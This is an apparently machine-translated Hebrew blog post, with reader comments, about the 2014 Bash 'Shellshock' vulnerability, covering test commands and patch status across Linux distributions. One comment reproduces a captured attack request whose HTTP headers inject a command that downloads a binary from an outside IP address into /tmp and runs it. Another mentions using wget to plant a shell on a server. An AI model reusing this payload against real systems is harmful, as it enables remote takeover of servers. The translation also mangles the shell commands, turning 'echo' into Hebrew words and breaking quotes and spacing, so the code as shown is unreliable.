זה פועל כמו מאש בכמה בלוגים, סיפור שפורסם ב בלוג אבטחה de רד האט על פגיעות שנמצאה ב- Bash בגלל שימוש לרעה במשתנים גלובליים. על פי החדשות המקוריות:
"... הפגיעות נובעת מכך שניתן ליצור משתני סביבה עם ערכים שנוצרו במיוחד לפני שהם קוראים למעטפת bash. משתנים אלה יכולים להכיל קוד שמבוצע ברגע שמופעלת המעטפת. אין משמעות לשמם של המשתנים המורכבים הללו, אלא רק לתוכנם. כתוצאה מכך, פגיעות זו נחשפת בהקשרים רביםלדוגמה:
- כוח פקודה הוא משמש בתצורות sshd כדי לספק יכולות ביצוע פקודה מוגבלות למשתמשים מרוחקים. ניתן להשתמש בפגם זה כדי למנוע זאת ולספק ביצוע פיקוד שרירותי. חלק מהיישומי Git ו- Subversion משתמשים בקונכיות מוגבלות כאלה. שימוש קבוע ב- OpenSSH אינו מושפע מכיוון שלמשתמשים כבר יש גישה למסוף.
- שרת אפאצ'י המשתמש ב- mod_cgi או mod_cgid מושפעים אם סקריפטים של CGI נכתבים בשני bash או בהשראת תת-רמות. גבהות משנה כאלה משמשות באופן מרומז על ידי מערכת / popen ב- C, על ידי os.system / os.popen ב- Python, אם משתמשים במעטפת מערכת / exec ב- PHP. (כאשר פועל במצב CGI), ופתח / מערכת בפרל (תלוי במחרוזת הפקודה).
- סקריפטים של PHP המופעלים באמצעות mod_php אינם מושפעים גם אם מופעלות רמות משנה.
- לקוחות DHCP קוראים סקריפטים של מעטפת כדי להגדיר את המערכת, עם ערכים שנלקחו משרת שעלול להיות זדוני. זה יאפשר לבצע פקודות שרירותיות, בדרך כלל כשורש, במכונת הלקוח DHCP.
- שדים ותוכניות שונות עם הרשאות SUID יכולים לבצע סקריפטים של מעטפת עם ערכי משתנה הסביבה שנקבעו / הושפעו מהמשתמש, שיאפשרו לבצע פקודות שרירותיות.
- כל יישום אחר שמתחבר לקליפה או מריץ סקריפט מעטפת כמו שימוש בבאש כמתורגמן. סקריפטים של מעטפת שאינם מייצאים משתנים אינם פגיעים לבעיה זו, גם אם הם מעבדים תוכן לא מהימן ושומרים אותו משתני מעטפת (משמאל) וגבהות משנה פתוחות.
... "
איך לדעת אם הבשש שלי מושפע?
בהתחשב בכך, יש דרך פשוטה מאוד לדעת אם אנו מושפעים מפגיעות זו. למעשה, בדקתי את אנטרגוס שלי וכנראה שאין לי שום בעיה. מה שעלינו לעשות הוא לפתוח מסוף ולשים:
env x = '() {:;}; הד פגיע 'bash -c "הד זה מבחן"
אם זה יוצא ככה אין לנו בעיה:
env x = '() {:;}; הד פגיע 'bash -c' הד זה מבחן 'bash: אזהרה: x: התעלמות מהגדרת פונקציה ניסיון bash: שגיאת ייבוא הגדרת פונקציה עבור' x 'זו בדיקה
אם התוצאה שונה, כדאי להשתמש בערוצי העדכון של ההפצות המועדפות עלינו כדי לראות אם הם כבר החילו את התיקון. אז אתה יודע 😉
עודכן: זו הפלט של עמית לעבודה המשתמש באובונטו 14:04:
env x = '() {:;}; הד פגיע 'bash -c "הד זה מבחן" פגיע זה מבחן
כפי שאתה יכול לראות, עד כה זה פגיע.
יש לי קובונטו 14.04 החל מ -64 ויש לי גם:
env x = '() {:;}; הד פגיע 'bash -c "הד זה מבחן"
פגיע
זה מבחן
כבר עדכנתי, אבל זה לא מתקן. מה לעשות?
חכה שיעדכנו. כבר eOS למשל עודכן .. 😀
כמה מוזר, יש לי גם את קובונטו 14.04
$ env x = '() {:;}; הד פגיע 'bash -c "הד זה מבחן"
bash: אזהרה: x: התעלמות מניסיון הגדרת פונקציה
bash: שגיאת ייבוא הגדרת פונקציה עבור 'x'
זה מבחן
אני מוסיף שגרסת החבילה "bash" שהורדה היום היא:
4.3-7ubuntu1.1
http://packages.ubuntu.com/trusty/bash
במקרה שלי, נותן את הפקודה, זה פשוט נותן לי את הדברים הבאים במסוף:
>
בכל מקרה, הבדיחה היא שעדכנתי את דביאן וויזי וזה מה שזרק אותי.
Wheezy עדיין פגיע לחלק השני של הבאג, לפחות אחר הצהריים (UTC -4: 30) הבעיה עדיין הייתה בעקבותיה: /
רק אימתתי שלאחר החלת עדכון הבוקר לא Slackware ולא Debian ולא Centos מושפעים מכך שקיבלו עדכון מקביל.
מה הופך את אובונטו לפגיעה עדיין בשעה זו? ותגיד לי שזה בטוח: ד.
אבל האם ניסית לעדכן את אובונטו?
עם העדכון של היום הם גם תיקנו את זה.
OK
מומחי אבטחה מזהירים מפני הפגיעות 'Bash', הדבר עלול להוות איום גדול יותר על משתמשי תוכנת לינוקס מאשר על הבאג Heartbleed, שם האקרים יכולים לנצל באג ב- Bash כדי להשתלט על המערכת במלואה.
טוד בירדסלי, מנהל הנדסה בחברת אבטחת הסייבר Rapid7, הזהיר כי הפגם דורג 10 בגלל חומרתו, כלומר יש לו השפעה מקסימאלית, ודורג "נמוך" למורכבות הנצל, כלומר קל יחסית להתקפות 'האקרים'. . על ידי שימוש בפגיעות זו, תוקפים יכולים להשתלט על מערכת ההפעלה, לגשת למידע חסוי, לבצע שינויים ועוד ", אמר בירדסלי. "כל מי שיש לו מערכות שתופסות את Bash צריך ליישם את התיקון מיד," הוסיף.
לפני פגיעות זו שמציגה את הכלים הישנים (GNU) במקום בו מתארח באך, יהיה זה נוח יותר עבור תוכנת לינוקס להיפטר מה- GNU ולשנות בכלי BSD.
נ.ב: אל תצנזר את חופש הביטוי שלי, ... אל תעליב אף אחד, ... אל תמחק את ההודעה שלי כמו ההודעה הקודמת שמחקתי!.
אה בבקשה אל תגזימו. כמה אני שונא את האנשים שמשתמשים ב- BSD ובוזים ל- GNU, לינוקס או כל דבר מהפרויקטים האלה.
אני איתך ואתה צודק לחלוטין לגבי חומרת החור הזה.
זו לא הייתה צנזורה, אלא יתירות (הערת את אותה הערה בפוסט של gnome 3.14)
«... ודורג 'נמוך' בגלל מורכבות הניצול, כלומר קל יחסית להתקפות האקרים»
האם חוסר התאמה מורגש?
איך יכול להיות קל לנצל את הפגיעות ובו בזמן להיות בעל רמת סיכון "נמוכה" מכיוון שהיא מורכבת כל כך לשימוש?
זה באג שנפתר תוך שעות מכמה שהכירו את זה, וכמו לבבי, אין דיווחים על ניצול (כמובן, יש לזה פחות זמן להכיר זה את זה).
זו עיתונות צהובונית יותר מסיכון אמיתי.
האם @Staff נראה לך לא חשוב? מה תגיד לי עכשיו?
GET./.HTTP/1.0
סוכן משתמש: .תודה-רוב
. קוקי: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
.הוסט: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
מפנה: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
.קבל:. * / *
$ קובץ nginx
nginx: ELF 32-bit LSB הפעלה, אינטל 80386, גרסה 1 (SYSV), מקושר סטטית, עבור GNU / Linux 2.6.18, הופשט
$md5sum nginx
5924bcc045bb7039f55c6ce29234e29a nginx
$ sha256 סכום nginx
73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx
אתה יודע מה זה? של שום דבר מסוכן ...
המצב די חמור, אבל משם להגיד שכדאי להפסיק להשתמש ב- bash לאופציה של BSD, זה כבר לכל היותר, בכל מקרה העדכון כבר שם, אני פשוט נוגע בעדכון ושום דבר אחר.
עכשיו PD, אני חושב שזה יותר עמית @robet, אני לא חושב שכאן המנהלים מוקדשים למחיקת תגובות כאלה כי כן, כי מאז שהשתתפתי בקהילה הזו הייתה לי הרגשה זו ואני מקווה שזה יישאר כך דֶרֶך.
ברכות.
אתה שם את אותה התגובה בדיוק על שני פוסטים שונים. אם אתה מנסה לקדם את "מקור" החדשות, סליחה, זה לא המקום.
באש מגיע מאוניקס (ומשובט ה- GNU שלו). גם מערכות מבוססות BSD כמו OSX מושפעות, ולדברי Genbeta, הם עדיין לא תוקנו. כמו כן, כדי לגשת ל- Bash אתה זקוק לחשבון משתמש, מקומי או באמצעות SSH.
@צוות:
1.- זה מסווג כרמה 10 (רמת סכנה מקסימאלית) בגלל כמות השירותים שיכולים להיות מושפעים מהבאג. בהערה הראשית הם מבהירים עובדה זו מאוד וטוענים כי הבאג יכול להשפיע על שירותים כמו אפאצ'י, sshd, תוכניות עם הרשאות התאבדות (בין היתר xorg).
2.- זה מסווג כדרגת קושי נמוכה בכל הקשור ליישומו, והדוגמה הטובה ביותר לכך היא סקריפט בדיקת הפגיעות ש- @elav הציב בפוסט. קשה מאוד ליישם הוא לא, כפי שאתה יכול לראות.
אינני רואה יתירות במידע (אני רואה רק תרגום בגוגל) ואם הבעיה די חמורה, וכפי שאתה אומר, יש לה כבר תיקון ופתרון, אבל לא בשביל זה, זה כבר לא סיכון, ודי אמיתי.
@petercheco / @Yukiteru
אל תפרש אותי לא נכון, אני חושב שברור שהביקורת שלי היא החדשות שרובט מקשר ומתמקד באי-התאמה ולא יתירות.
באותו אופן, עלינו להבדיל בין סיכון לסכנה (אני לא מזכיר את האחרון), בדרך כלל אנו משתמשים בהם כמילים נרדפות, אך כאן, סכנה תהיה יכולת הנזק של הבאג וסיכון ההסתברות להתרחשותו.
במקרה המסוים שלי נכנסתי מאתמול. זה לא היה עבור רשימות תפוצה או משהו כזה. זה היה עבור הפצה שולחנית! הרמתי את הטלפון ושלחתי הודעה לסיסאדמין עם הקישור ואישרתי שיש לי את כל הדברים טלאים, ואז תסלח לי אבל החדשות האלה לא משאירות אותי ער.
בפורומים אחרים הם מזכירים את הפגיעות של Bash, "הפיתרון שדביאן ואובונטו שחררו", אך היום הם גילו כי עדיין קיימת פגיעות, כך שהפתרון לא היה שלם, זה מה שהם מזכירים!
אני רואה שרבים מתחו עלי ביקורת על העובדה הפשוטה שמונעים מאנשים את חומרת הפגיעות - מוסמכת ברמה 10 של מסוכנות מרבית, והזכירה פתרונות אפשריים לתוכנת לינוקס מול כלי ה- GNU המיושן בו מתארח בש - אשר באופן מושלם ניתן להחליף את GNU בכלי BSD בתוכנת לינוקס, ... אני גם משתמש בלינוקס ואני אוהב את לינוקס!
אני מבהיר ש- Bash לא מגיע כברירת מחדל המותקן ב- BSD, זו עוד חבילת תאימות לינוקס אחת שניתן להתקין ב- BSD ... כן! והמקור מוגדר כך שיוכלו לבדוק את החדשות, מכיוון שרבים מהמשתמשים לפעמים לא מאמינים להודעה או לתגובה.
robet: כפי שכבר אמרו לך שוב ושוב, אתה כבר שם את ההערה שלך עם החדשות בפוסט, אתה לא צריך להכניס אותה לכל פוסט שאתה מגיב.
בערך bash, שכן ישנם קליפות אחרות בהן ניתן להשתמש במקרה שבש פגיע. 😉
רובוט, למיטב ידיעתי אין תוכנה שמשלבת את ליבת הלינוקס עם ארץ המשתמש של BSD. הדבר הכי קרוב הוא להיפך, kBSD + GNU, כמו שעושים ג'נטו ודביאן. חוץ מזה, GNU (1983) לא יכול היה להיקרא "מיושן" אם זה אחרי BSD (1977). שניהם חולקים את שורש ה- unix שלהם (אך לא את הקוד), לא תהיה "תאימות לינוקס" אם Bash נוצר כאשר Linus T היה עדיין ילד.
אה, בדיקת דביאן בשלב זה היא "פגיעה" איזה רצף יש לנו ...
אני משתמש בבדיקות דביאן ואפילו בענף זה קיבלנו את עדכון הבאש
על פי ג'נטה יש גם פגיעות אחרת
http://seclists.org/oss-sec/2014/q3/685
הפקודה לשאילתה היא
env X = '() {(a) => \' sh -c "הד פגיע"; bash -c "הד כשל 2 לא תוקן"
אותו אני.
כנ"ל כאן. אך הבאג המקורי בפוסט תוקן ב- (L) אובונטו 14.04
במקום לעשות הד פשוט, נסה לגרום לו לבצע הוראה הדורשת הרשאות, אני זורק "לא מספיק הרשאות" ... באג זה לא מסלים הרשאות? אם הוא לא מסלים הרשאות אז זה לא מסוכן כמו שהם מציירים אותו. .
אתה צודק!! הם היו שתי נקודות תורפה ...
בעיני בלינוקס מנטה 17 לאחר עדכון הבש השני שהכניסו את מאגרי אובונטו אמש, עם ביצוע הפקודה המעטפת מציעה את הפלט הזה:
env X = '() {(a) => \' sh -c "הד פגיע"; bash -c "הד נכשל 2 לא הותאם"
>
הגרסה של "bassh" שהוכנסה למאגרי אובונטו כדי לעדכן את הקודמות היא:
4.3-7ubuntu1.2
במערכות הנגזרות מדביאן תוכלו לבדוק את הגרסה המותקנת באמצעות פקודה זו:
dpkg -s bash | גרסת grep
בכל מקרה, זה צריך להיות מובהר, לפחות עבור משתמשי דביאן, אובונטו ומנטה; אתה לא צריך להיות מודאג יותר מדי מתוכניות שמריצות סקריפטים עם כותרת #! / Bin / sh מכיוון שבפצות אלה / bin / sh לא קורא "bash", אלא נקשר לקליפה "dash" (מקף הוא :)
קונסולת האלכימאים של דביאן (מקף) היא קונסולת POSIX נגזרת
של אפר.
.
מכיוון שהוא מבצע סקריפטים מהר יותר מאשר bash, ויש לו פחות תלות
ספריות (מה שהופך אותו לחזק יותר בפני כשלים בתוכנה או
חומרה), הוא משמש כקונסולת המערכת המוגדרת כברירת מחדל במערכות
דביאן.
לכן, לפחות באובונטו, "bash" משמש כמעטפת לכניסה למשתמש (גם עבור משתמש השורש). אך כל משתמש יכול להשתמש במעטפת אחרת כברירת מחדל עבור המשתמש ומסוף השורש (מסופים).
קל לבדוק שהקליפה מבצעת את הסקריפטים (#! / Bin / sh) על ידי ביצוע הפקודות הבאות:
קובץ / סל / ש
(הפלט הוא / bin / sh: קישור סמלי ל- `מקף ') אנו עוקבים אחר המעקב החוזר על הפקודה
קובץ / סל / מקף
(הפלט הוא / bin / dash: ELF 64-bit LSB אובייקט משותף, x86-64, גרסה 1 (SYSV) אז זה ההפעלה.
אלה התוצאות בהפצה של לינוקס מנטה 17. בהפצות אחרות שאינן מבוססות אובונטו / דביאן הן עשויות להיות שונות.
לא קשה לשנות את מעטפת ברירת המחדל !! אתה יכול אפילו להשתמש באחד אחר עבור משתמשים ולמשתמש השורש. למעשה אתה רק צריך להתקין את המעטפת על פי בחירתך ולשנות את ברירת המחדל באמצעות הפקודה "chsh" או על ידי עריכת הקובץ / etc / passwd (אם כי משתמשים שלא יודעים את ההשלכות של שגיאה בעת עריכת הקובץ "passwd", עדיף שהם יידעו את עצמם טוב מאוד ולפני עריכתו, הכינו עותק של המקור למקרה שיש צורך לשחזר אותו).
אני מרגיש יותר בנוח עם "tcsh" (tcsh הוא :)
קונסולת ה- TENEX C, גרסה משופרת של ה- csh של ברקלי
"Csh" השתמש ב- Mac OS X לפני כמה שנים. וזה הגיוני בהתחשב בכך שרוב ממערכת ההפעלה של אפל היא קוד FreeBSD. כעת ממה שקראתי אתמול נראה שהם מספקים גם "bash" למסופי משתמשים.
מסקנות:
- כבר הופצו גרסאות "bash" מתוקנות להפצות הנפוצות ביותר
- גרסת "bash" 4.3-7ubuntu1.2 ואילך אינה מכילה באגים אלה
- אין חובה להשתמש ב- "bash" במערכת ההפעלה * לינוקס
- מעט * הפצות לינוקס מקשרות #! / Bin / sh עם "bash"
- ישנן חלופות: אפר, מקף, csh, tcsh ועוד
- לא מסובך לשנות את מעטפת ברירת המחדל שהמערכת קוראת לה בעת פתיחת מסוף
- מעט מכשירים קטנים (ראוטרים ואחרים) משתמשים ב"באש ", כי הוא גדול מאוד !!
כרגע הגיע עדכון נוסף שמתקין גרסה אחרת של "bash" 4.3-7ubuntu1.3
עבור Linux Mint 17 ו- Ubuntu 14.04.1 LTS
ArchLinux נכנסה לגרסה bash-4.3.026-1
@ Xurxo ... .csh מברקלי?, ... אתה מבין משהו ממה שאני מדבר לעיל, ועדיף להשתמש ב- BSD "csh" ... ולא בכלי ה- GNU הישן שבו מתארח בש. הכלי הזה הוא הטוב ביותר עבור תוכנת לינוקס.
אני מניח שזה הבאג
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760
נָכוֹן?
ומה יהיה הפיתרון?
חכה שיעדכנו את החבילה בהפצה שלך 😉
הבאג הוטבל כקלף
http://www.theregister.co.uk/2014/09/24/bash_shell_vuln/
פגיע
זה מבחן
עדיין אין תיקון עבור אובונטו סטודיו 14.04
תוקן באובונטו סטודיו 14.04.1
wisp @ ubuntustudio: ~ $ env x = '() {:;}; הד פגיע 'bash -c "הד זה מבחן"
bash: אזהרה: x: התעלמות מניסיון הגדרת פונקציה
bash: שגיאת ייבוא הגדרת פונקציה עבור 'x'
זה מבחן
למעשה מדובר בפגיעות מינורית, אם זה משפיע עליך זה שעשית משהו לא בסדר לפני ...
מכיוון שסקריפט bash הפועל עם הרשאות שורש לעולם לא צריך להיחשף למשתמש. ואם הוא מתמודד בלי הרשאות, אין כזו בולטות. למעשה, זה שטויות. הרבה הפחדות.
אני חושב אותו דבר.
בדיוק, כדי למכור יותר עיתונים או לקבל יותר ביקורים, החרקים האלה טובים.
אבל הם תמיד שוכחים להזכיר שכדי להתפשר על מחשב עם סקריפטים מסוג זה, תחילה עליך לקבל גישה ל- bash ואז להשתמש בו כשורש.
צוות אם אתה משתמש באפצ'י עם cgi, פשוט הכניס את כותרות http כעוגיות או הפנה את הפונקציה שברצונך לבצע. זה אפילו שימש להפצת תולעים.
ואם מישהו מכניס מעטפת לשרת עם wget mishell.php, במקרה זה זה לא רציני, נכון?
מסכים איתך. חשבתי שזה באג ענק כמו זה שב Heartbleed (אפילו ה- NSA השאיל את עצמו כדי לתדלק את התחלואה), אבל אחרי הכל זה היה באג קל.
יש עוד באגים רציניים כמו הצריכה המטורפת של פלאש וירידת הביצועים בפלפל נגן, וזה שכבר תוקן באג webRTC ב- Chrome וב- Firefox.
האם אתה יודע אם יש לו הסדר לאנשים שיש להם Linux Mint 16?
בבדיקות דביאן זה כבר תוקן.
ב -5 ההפצות שלי זה נפתר, ב- OS X שלי אני לא יודע.
אנא, אל תצנזר את הערתי, אמרתי OS X. אני לא יודע אם אתה יכול לומר OS X באתר זה.
@yoyo ובכן אל תחרפן את זה יותר מדי שהם עדיין עובדים על כמה פרטים של התיקון ... נסה את זה ואז תגיד לי, לך XD
env x = '() {:;}; הד פגיע 'bash -c "הד אני פגיע יותר מאשפה של iphone 6"
שאם הם פתרו את זה 100% לפני OS X אני מתערב בכל דבר
ובכן, גם בארס טכניקה הם נותנים רלוונטיות לבש ב- OSX.
@Yoyo התגובה הבאה על OS X עבור SPAM .. lla tu save .. 😛
@yoyo שם כדי לתקן את הצעות המחיר ... אבל את השאר אתה יודע 😉
ה- FSF דיבר
https://fsf.org/news/free-software-foundation-statement-on-the-gnu-bash-shellshock-vulnerability
כאילו הם הפכו להתנשאות עם OSX (מכיוון ש- OSX עדיין משתמשת בש: v).
בכל מקרה, אני לא צריך להתעסק עם דביאן ג'סי כל כך הרבה.
אם המערכת פגיעה במערכת ההפעלה של Cent:
יאמקה את הכל && yum עדכון
כדי לראות את גרסת ה- bash:
סל"ד -qa | grep bash
אם הגרסה קודמת ל- bash-4.1.2-15.el6_5.1 המערכת שלך עשויה להיות פגיעה!
ברכות.
פגיעות שנייה טרם נפתרה
env amvariable2 = '() {(a) => \' sh -c "הד amVulnerable"; bash -c "הד כשל 2 לא תוקן"
מעדכן ...
ההפך קורה לי בגנטו, אני פגיע רק לכישלון הראשון, אבל בשני אני מקבל את זה:
[code] sh: X: שורה 1: שגיאת תחביר ליד אלמנט לא צפוי `= '
sh: X: שורה 1: "
sh: שגיאת ייבוא הגדרת פונקציה עבור 'X'
sh: פגיע: הפקודה לא נמצאה
באג 2 לא תוקן
[/ קוד]
אני לא יודע אם תהיה כבר גרסה יציבה של Bash עם הבאגים קבועים, אך כך או כך היא תמתין בפעם הבאה שאעשה -סינכרון && יוצא –עדכון –עמוק –עם- bdeps = ו- - newuse @world (ככה אני מעדכן את כל המערכת).
יש לי את ג'נטו עם גרסה 4.2_p50 ועד כה היא עברה את כל המבחנים. נסה להופיע –סנכרון ואז להופיע -av1 app-shells / bash, ואז לבדוק שיש לך גרסה 4.2_p50 באמצעות הפקודה bash –version.
ניסית את זה?
ועם חבילות חדשות, מבחן חדש שמספק רד האט
cd / tmp; rm -f / tmp / הד; env 'x = () {(a) => \' bash -c "תאריך הד"; חתול / tmp / הד
אם המערכת שלנו לא פגיעה ותוקנה כהלכה, היא חייבת לתת לנו משהו כזה
תאריך 1
2 cat: / tmp / echo: הקובץ או הספריה אינם קיימים
נסה כך:
env X = '() {(a) => \' sh -c "הד פגיע"; bash -c "הד כשל 2 טלאים"
אני מקבל
פגיע
באג 2 תוקן.
עזוב, הקו מעוצב בצורה גרועה.
מעולה! כבר עשיתי את העדכון ב- Slackware שלי, תודה!
היי, יש לי שאלה, יש לי כמה שרתים עם 10 סיביות "SUSE Linux Enterprise Server 64".
כשאני מבצע את הפקודות אני פגיע, אני פגיע אפילו יותר מהאשפה של ה- iPhone 6 xD
אם אני לא טועה בעדכון / התקנת חבילות ב- SUSE זה נעשה באמצעות הפקודה «zypper».
בכמה שרתים זה אומר לי את זה:
BIAL: ~ # זיפר למעלה
-bash: zypper: הפקודה לא נמצאה
BIAL: ~ #
ובאחרים זה:
SMB: ~ # זיפר למעלה
משחזר מקורות מערכת ...
מנתח מטא נתונים עבור SUSE Linux Enterprise Server 10 SP2-20100319-161944 ...
מנתח מסד RPM ...
סיכום:
אין מה לעשות.
מה שאני עושה?
אני יודע שיש האומרים שפגיעות היא פחות ממה שהם מציירים אותה, אך יש לי אותה ואני לא רוצה להיחשף לסיכון, בין אם זה קטן או גדול.
ברכות.
לילה טוב, ניסיתי להדביק את הקוד שסיפקת במאמר, אני מבין את זה
sanders @ pc-sanders: ~ $ env x = '() {:;}; הד פגיע 'bash -c "הד זה מבחן"
זה מבחן
sanders @ pc-sanders: ~ $
בבקשה תסביר לי כיצד לתקן את ההפצה, אני מעדכן מדי יום ולא רואה שינויים בפלט ההנחיה.
תודה רבה לך!